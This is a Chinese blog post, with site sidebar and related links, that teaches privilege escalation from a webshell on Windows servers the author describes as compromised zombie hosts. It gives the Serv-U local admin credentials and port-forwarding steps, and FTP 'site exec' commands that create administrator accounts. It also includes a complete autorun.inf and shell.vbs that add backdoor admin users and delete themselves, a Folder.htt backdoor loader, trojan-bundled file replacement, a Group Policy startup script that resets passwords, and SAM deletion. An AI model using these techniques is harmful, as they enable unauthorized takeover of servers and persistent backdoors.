WEBSHELL权限提升(菜菜)

1-9:学习shell权限 文章目录前言:一:所有者,组成员和其他人二:读取,写入和执行三:chmod-更改文件模式 前言: Linux不止是多任务操作系统,更关键的他还是多用户操作系统,这意味着同一时间内可以有多个用户使用同一台计算机 如果计算机连接到一个网络或者互联网中,远程用户可以通过ssh(云服务器就是这样)登录并操作这台计算机。 用户一多,就有很多出现一些错乱,比如说一个用户访问到了另一个用户的文件,所以用户管理就显得格外重要 本章设计命令如下 id:显示用户身份标识 chmod:修改权限 umask:设置默认权限(粘滞位 阅读详情

动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容
OK,进入我的WEBSHELL             
啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊
输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望了
一 serv-u提升
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21
显示竟然是3.0的,唉,不得不说这个管理员真的不称职。后来完毕后扫描了下,也只有FTP的洞没有补。既然是这样,我们就开始我们的提升权限了
上传FPIPE,端口转发工具, 图三
在运行CMD命令里输入d:/wwwroot/fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口
然后打开我们自己机子上的SERV-U,点Serv-U服务器,点菜单栏上的的服务器,点新建服务器,然后输入IP,输入端口,记得端口是刚刚我们转发的81端口。服务名称随便你喜欢,怎么样都行。然后是用户名:LocalAdministrator  密码:#l@$ak#.lk;0@P   (密码都是字母)
确定,然后点刚刚建的服务器,然后就可以看到已有的用户,自己新建一个用户,把所有权限加上。也不锁定根目录
接下来就是登陆了,登陆FTP一定要在CMD下登陆,
进入后一般命令和DOS一样,添加用户的时候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果对方开了3389的话,就不用我教你怎么做了,没开的话,新建立IPC连接,在上传木马或者是开启3389的工具

auto.ini 加 SHELL.VBS

autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh 
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序

Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下,觉得一个不够,可以多放几个
Folder.htt添加代码
<OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后门文件名”>
</OBJECT>
但是后门和这两个文件必须要放到一块,有点问题,可以结合启动VBS,运行结束后,删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上


replace
替换法,可以替换正在执行的文件。用这个几乎可以马上得到权限,但是我没有做过试验,可以试下,将对方正在执行的文件替换为和它文件名一样的,捆绑了木马的。为什么不直接替换木马呢?如果替换的是关键程序,那不是就直接挂了?所以还是捆绑好点
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W]

 [drive1:][path1]filename 指定源文件。
 [drive2:][path2] 指定要替换文件的
              目录。
 /A 把新文件加入目标目录。不能和
              /S 或 /U 命令行开关搭配使用。
 /P 替换文件或加入源文件之前会先提示您
              进行确认。
 /R 替换只读文件以及未受保护的
              文件。
 /S 替换目标目录中所有子目录的文件。
              不能与 /A 命令选项
              搭配使用。
 /W 等您插入磁盘以后再运行。
 /U 只会替换或更新比源文件日期早的文件。
              不能与 /A 命令行开关搭配使用
这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下

脚本
编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:

[Startup]
0CmdLine=a.bat
0Parameters=

将文件scripts.ini保存到“C:/winnt/system32/GroupPolicy/Machine/Scripts”
A.BAT的内容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator  XXX
这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限

SAM
如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空
突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换

linux下用webshell修改文件权限 <br /><br />当我们拥有了一个linux下的shell服务器上多个网站)。<br />这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。<br />那么,这样的主机设置肯定是不安全的。<br />有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。<br />我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。<br />代码:<br /><?php<br />$path = stripslashes($_GET 阅读详情

相关推荐

关于WEBSHELL中的命令提示符没有权限提升

有很多朋友问他得到了一个WEBSHELL,但是想用命令提示查看用户信息什么的,但是很多主机限制了执行命令,所以很多WEBSHELL就不能失去了很大的功能......前二天桂林老兵ASP站长助手6.0刚出来,我就以ASP站长助手6.0为例把它上传到一个禁止执行的虚拟主机,然后上传一个CMD.exe,然后调用你上传的CMD来执行命令...... 本来想搞图文教程的,但感觉太简单,文字就可以说明清楚了

蓝法典的专栏 2683

Linux - Shell 权限 权限管理 权限修改 权限身份的认证 目录的权限 粘滞位

我们来输入指令的本质就是 输入字符串。而指令的本质,就是编译好的文件和脚本,而只要是文件,就会在系统的特定路径下存放。而在windows当中使用的就是,而且在 LInux当中使用的就是,用的来交互。如果我们输入的命令时非法访问 ,或者是 对操作系统当中的不能修改的文件,有修改的操作的,那么上述的 命令行解释器就可以帮我们识别,然后进行 相应的结束或者是提示。这就变相的保护了操作系统。像上述说的 命令行 命令行解释器 bash sh shell 其实都是一样的。

chihiro1122的博客 5324

WEBSHELL权限提升技巧(综合版)

c: d: e:.....C:/Documents and Settings/All Users/「开始」菜单/程序/看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,

蓝法典的专栏 4243

【Linux】shell权限理解

本篇博客主要讲解了shell 命令及其运行原来、权限的概念、权限管理、文件相关指令以及粘滞位等等。那么以上就是本篇博客的全部内容了,如果大家觉得有收获的话,可以点个三连支持一下!💖💝❣️。

joy.728的博客 2298

WEBSHELL权限提升 菜菜

WEBSHELL权限提升 菜菜

qq_43667702的博客 877

TryHackMe OverPass 3 - 全网最细

这个是菜菜TiAmo的复现和学习日记,如果感觉不错点点关注和喜欢吧。

m0_57363026的博客 1380

MSSQL内网渗透案例分析

主题:MSSQL内网渗透案例分析 发表:黑白前线 友情提交到t00ls.net 与某菜菜们分享注:附件太多了,就引用站上的图片吧。高手老鸟飘过!描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术!本文敏感信息以屏蔽!密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行,再通过自己的灵活思维运用。 环境:2003 SER...

weixin_30322405的博客 257

【linux--->shell权限管理】

本篇博客主要围绕文件,目录和用户的使用操作,介绍了linux的权限的表示方法,如何使用,怎么修改,使用到了chmod、chown、chgrp,sudo,umask,等指令。

kk1125778230的博客 7573

Linux篇:Shell命令以及运行原理 和 权限

目录的可执行权限是表示你可否在目录下执行命令。

m0_74756975的博客 2447

Shell运行原理以及Linux中的权限问题

Windows以图形化界面为交互方式,而Linux以命令行界面为交互方式。Windows和Linux的交互方式虽然不同,但本质上是一样的,图形化界面和命令行界面都是为了让用户进行相关操作,而图形化界面和命令行界面即"外壳程序"Linux严格意义上说是一个操作系统内核,被称为"核心(kernel)",但一般用户不能直接使用kernel,而是通过kernel的"外壳程序",即Shell,来与kernel沟通Shell即"

GG_Bruse的博客 885

webshell、一句话木马的权限问题

webshell一句话木马权限大小是由什么决定的。 webshell权限由不同级别的用户去运行容器所决定! 通俗来说,如果是管理员运行web服务器,那么上传的木马被容器解析之后,它(shell)权限就是管理员的权限,如果是普通用户运行web服务器,那么上传的木马被容器解析之后,它(shell)权限就是普通用户的权限

m0_46736332的博客 3305

【linux】shell权限

目录 一、什么是shell? 二、为什么存在shell? bash和shell的区别 一、什么是权限? 二、修改权限 一、修改文件权限 二、修改用户 三、不受权限约束的超级用户“root” 三、默认权限 1、默认的权限 2、umask(权限掩码) 一般普通文件,起始权限是666,但是我们看到的普通文件起始权限是664,是为什么呢? 修改权限掩码 4、权限的经典面试题 (1)进入应该目录、读取一个文件、在一个目录下写文件分别都需要什么权限? (2)在同一目录下,如何防止其他用户

m0_47646784的博客 3555

webshell提权

首先我们要清楚为什么要提权相关操作被拒绝。无法继续进行渗透。就需要提权我们通过各种web漏洞,中间件漏洞,或者cms等漏洞拿到权限后。得到的权限一般是后台权限,有些是webshell权限。如果是后台权限,我们就要通过后台上传后门得到webshell。然后反弹到我们的渗透工具中进行使用。我们所使用的蚁剑,哥斯拉,冰蝎,原理都是一种webshell管理工具。但我们的最终目的是为了得到服务器权限,而且是服务器的最高权限。我们才能更好的利用工具进行后渗透,也就是内网渗透。渗透的权限从低到高大概分为。

m0_65096687的博客 1659

安卓怎么进入adb shell

手机设置--开发者选项,进入之后勾选USB调试功能,没有开发者选项的进入关于手机---软件版本,不停的点击版本号即可调处开发者选项。载入ADB工具,快捷键WIN+R打开,输入cmd,打开命令控制台,输入cd+空格+adb工具包的路径,比如cd c:/urser/administrator/desktop/adb 这个路径是放在桌面上的路径,如果用一些刷机软件直接进入adb控制台的就不需要加载了。

Abby同学思考的地方 1万+

初识shell

1.为什么会有shell? 2.shell是什么?

LGZJ5921221的博客 2360

Linux【shell命令以及运行原理】【权限

如果目录没有-x权限,则无法对目录执行任何命令,甚至无法cd进入目,即使目录仍然有-r读权限(这个地方很容易犯错,认为有读权限就可以进入目录读取目录下的文件)而如果目录具有-x权限,但没有-r权限,则用户可以执行命令,可以cd进入目录。我们如果是文件的拥有者,又属于文件的所属组,但是我们被root设定了没有文件的读取权限,但是我们的所属组有文件的读取权限,我们依然无法读取文件。普通用户可以在命令前加上sudo,就是执行以下命令,要以root的权限执行,仅限这一次,输入的密码为普通用户自己的密码。......

芊樱烛渊的博客 4025

Shell 命令运行原理和权限详解

Shell命令的权限通常由系统管理员进行设置,普通用户只能根据自己的权限执行相应的命令。如果需要执行具有特殊权限的命令,用户需要提升自己的权限或者将命令的可执行权限修改为普通用户可执行。在Linux系统中,每个文件和目录都有自己的权限设置,由权限位来控制对文件或目录的访问权限。如果用户输入的命令是合法的,Shell会将命令交给系统执行。Shell在接收到用户的命令后,会将命令分成几个部分,例如命令名称、参数、选项等,然后判断命令是否合法。其他用户权限:除了所有者和同组用户外,其他用户对其具有的权限

wgq2020的博客 1313

shell运行原理、权限

一、shell运行原理1、简介2、shell的简单定义3、外壳程序的意义4、简易示例图二、Linux下的两种用户三、whoami命令四、su命令五、Linux权限管理1、文件归属2、文件权限图3、文件类型4、文件名后缀5、文件权限(2)rwx-代表的意义6、文件的归属六、chmod指令(1)用户表示符+/-=权限字符(2)属性符号七、chown指令与chgrp指令1、chown指令2、chgrp指令八、umask指令九、粘滞位

Snow_Dragon_L的博客 958
上一篇: JPEG漏洞玩转局域网(菜菜)
下一篇: Tracert In The Bat (ALLyeSNO)
freexploit
博客等级 码龄22年 315粉丝 778原创
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值